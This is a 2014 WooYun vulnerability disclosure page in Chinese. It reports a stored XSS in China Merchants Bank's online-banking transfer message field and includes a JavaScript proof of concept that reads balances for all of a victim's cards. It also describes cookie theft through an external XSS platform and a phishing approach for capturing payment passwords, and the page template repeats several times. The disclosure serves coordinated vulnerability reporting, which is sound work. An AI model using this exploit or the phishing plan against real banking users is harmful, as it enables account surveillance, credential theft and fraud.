招商银行网银定向xss通杀网页、PC端及手机APP（可定向窃取信息钓鱼种马）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-070306

漏洞标题：招商银行网银定向xss通杀网页、PC端及手机APP（可定向窃取信息钓鱼种马）

漏洞作者：肉肉

提交时间：2014-07-30 15:30

修复时间：2014-09-13 15:34

公开时间：2014-09-13 15:34

漏洞类型：xss跨站脚本攻击

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-07-30：细节已通知厂商并且等待厂商处理中
2014-07-30：厂商已经确认，细节仅向厂商公开
2014-08-09：细节向核心白帽子及相关领域专家公开
2014-08-19：细节向普通白帽子公开
2014-08-29：细节向实习白帽子公开
2014-09-13：细节向公众公开

简要描述：

招商银行网银某处存储型xss，网页版，PC客户端，手机客户端均受影响。不敢用网银了T_T

详细说明：

以下是用客户端做的测试
招商银行网银自助转账的留言处存在存储型xss，

查询交易记录的时候触发

可加载执行外部js，
利用xss平台获取cookie

这里还找piaca帮忙写了一个获取余额的poc

xmlhttp = new ActiveXObject("Msxml2.XMLHTTP.3.0");
function getBalance(cardNo, clientNo){
    var url = "/CmbBank_PB/UI/PBPC/DebitCard_CustomerService/cs_HomePageAnalyzer.aspx";
    var postData = "Params=%253CAccountUID%253E" + cardNo + "%253C%252FAccountUID%253E&CardIndex=1&ClientNo=" + clientNo + "&PRID=GetBalanceXmlCmbBank&HASH=0.5168066995926853"
    xmlhttp.Open("POST", url, false);
    xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xmlhttp.send(postData);
    return xmlhttp.responseText;
}
window.onload = function(){
    var clientNo = document.getElementById("ClientNo").value;
    var cards = "";
	
    try{
        var card = document.getElementById("ddlDebitCardList").getElementsByTagName("option");
        var cardLength = card.length;
        for(var i=0;i<cardLength;i++){
            var resp = getBalance(card[i].value, clientNo);
            var balance = resp.match(/<HQYE>(.*?)<\/HQYE>/)[1];
            cards = cards + card[i].value + "=" + balance + "|";
        }
    }catch(e){}
    
    alert(cards);
}

因为转账需要支付密码所以没办法直接转账，不过可利用此xss做一个钓鱼页面先获取支付密码再进行转账操作也是可行的。
在这样的页面下让输入银行卡支付密码了别说是没有安全意识的人了，就算是有安全意识的人估计会中招的也不会少，所以危害还是挺大的。
经测试招行网银网页版和手机客户端均存在这样的问题

漏洞证明：

快一点修复吧，现在每次打开网银都弹啊弹，好伤心啊
另外，建议对其他地方也做检测一下

修复方案：

过滤啊

版权声明：转载请注明来源肉肉@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2014-07-30 21:27

厂商回复：

谢谢对招商银行安全的关注

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-070306

漏洞标题：招商银行网银定向xss通杀网页、PC端及手机APP（可定向窃取信息钓鱼种马）

相关厂商：招商银行

漏洞作者：肉肉

提交时间：2014-07-30 15:30

修复时间：2014-09-13 15:34

公开时间：2014-09-13 15:34

漏洞类型：xss跨站脚本攻击

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源肉肉@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-070306

漏洞标题：招商银行网银定向xss通杀网页、PC端及手机APP（可定向窃取信息钓鱼种马）

相关厂商：招商银行

漏洞作者： 肉肉

提交时间：2014-07-30 15:30

修复时间：2014-09-13 15:34

公开时间：2014-09-13 15:34

漏洞类型：xss跨站脚本攻击

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-070306"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 肉肉@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：肉肉

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源肉肉@乌云